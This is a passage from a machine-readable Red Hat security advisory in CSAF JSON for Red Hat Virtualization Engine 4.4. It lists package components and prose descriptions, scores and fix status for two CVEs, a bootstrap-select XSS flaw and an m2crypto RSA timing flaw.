"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch"
},
"product_reference": "ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ovirt-web-ui-0:1.6.7-1.el8ev.src as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
},
"product_reference": "ovirt-web-ui-0:1.6.7-1.el8ev.src",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
},
"product_reference": "python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rhvm-0:4.4.5.9-0.1.el8ev.noarch as a component of RHEL-8-RHEV-S-4.4 - Red Hat Virtualization Engine 4.4",
"product_id": "8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
},
"product_reference": "rhvm-0:4.4.5.9-0.1.el8ev.noarch",
"relates_to_product_reference": "8Base-RHV-S-4.4"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2019-20921",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2020-09-24T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1882273"
}
],
"notes": [
{
"category": "description",
"text": "bootstrap-select before 1.13.6 allows Cross-Site Scripting (XSS). It does not escape title values in OPTION elements. This may allow attackers to execute arbitrary JavaScript in a victim\u0027s browser.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "In OpenShift Service Mesh (OSSM) the openshift-service-mesh/kiali-rhel7 container (which installs the kiali rpm) is behind OpenShift OAuth authentication restricting access to the vulnerable bootstrap-select library to authenticated users only, therefore the impact is low.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2019-20921"
},
{
"category": "external",
"summary": "RHBZ#1882273",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1882273"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2019-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20921"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2019-20921",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20921"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-9r7h-6639-v5mw",
"url": "https://github.com/advisories/GHSA-9r7h-6639-v5mw"
},
{
"category": "external",
"summary": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457",
"url": "https://snyk.io/vuln/SNYK-JS-BOOTSTRAPSELECT-570457"
}
],
"release_date": "2019-02-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:1169"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "nodejs-bootstrap-select: not escaping title values on \u003coption\u003e may lead to XSS"
},
{
"cve": "CVE-2020-25657",
"cwe": {
"id": "CWE-203",
"name": "Observable Discrepancy"
},
"discovery_date": "2020-10-19T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "1889823"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in all released versions of m2crypto, where they are vulnerable to Bleichenbacher timing attacks in the RSA decryption API via the timed processing of valid PKCS#1 v1.5 Ciphertext. The highest threat from this vulnerability is to confidentiality.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "m2crypto: bleichenbacher timing attacks in the RSA decryption API",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-imageio-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-ovirt-engine-common-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-tools-backup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-vmconsole-proxy-helper-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-webadmin-portal-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-websocket-proxy-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:python3-ovirt-engine-lib-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:rhvm-0:4.4.5.9-0.1.el8ev.noarch"
],
"known_not_affected": [
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.noarch",
"8Base-RHV-S-4.4:ansible-runner-0:1.4.6-2.el8ar.src",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ansible-runner-service-0:1.0.7-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:apache-sshd-0:2.6.0-1.el8ev.src",
"8Base-RHV-S-4.4:apache-sshd-javadoc-0:2.6.0-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-0:4.4.5.5-1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-dwh-grafana-integration-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dwh-setup-0:4.4.5.5-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-web-ui-0:1.6.7-1.el8ev.src",
"8Base-RHV-S-4.4:python3-ansible-runner-0:1.4.6-2.el8ar.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2020-25657"
},
{
"category": "external",
"summary": "RHBZ#1889823",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1889823"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2020-25657",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-25657"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-25657",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2020-25657"
}
],
"release_date": "2020-11-13T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-04-14T16:34:39+00:00",
"details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/2974891",
"product_ids": [
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-0:4.4.5.9-0.1.el8ev.src",
"8Base-RHV-S-4.4:ovirt-engine-backend-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-dbscripts-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-health-check-bundler-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-restapi-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-base-0:4.4.5.9-0.1.el8ev.noarch",
"8Base-RHV-S-4.4:ovirt-engine-setup-plugin-cinderlib-0:4.4.5.9-0.1.el8ev.noarch",
